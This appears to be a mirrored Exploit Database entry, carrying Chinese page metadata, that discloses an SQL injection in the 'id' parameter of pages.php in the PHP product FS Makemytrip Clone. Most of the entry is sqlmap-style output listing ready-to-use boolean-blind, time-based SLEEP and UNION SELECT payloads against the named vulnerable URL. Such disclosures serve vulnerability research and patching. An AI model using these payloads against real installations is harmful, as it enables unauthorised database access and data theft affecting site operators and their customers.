FS Makemytrip Clone – ‘id’ SQL Injection

• Exploit Database
• 40 阅读

• 作者： Dan°
  日期： 2017-12-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43213/

• # Exploit Title: FS Makemytrip Clone - SQL Injection
  # Date: 2017-12-05
  # Exploit Author: Dan°
  # Vendor Homepage: https://fortunescripts.com/
  # Software Link: https://fortunescripts.com/product/makemytrip-clone/
  # Version: 2017-12-05
  # Tested on: Kali Linux 2.0
  
  (PoC):
  SQL Injection on GET parameter = id
  http://localhost/pages.php?id=
  
  ---
  Parameter: id (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=1 AND 2990=2990
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 OR time-based blind
  Payload: id=1 OR SLEEP(5)
  Type: UNION query
  Title: Generic UNION query (NULL) - 4 columns
  Payload: id=-4648 UNION ALL SELECT
  NULL,NULL,CONCAT(0x716b767a71,0x47714f5a66644664796a6a426879674757634b707753727544424f616944536d4d70655276565854,0x7178627171),NULL--
  YbYU
  ---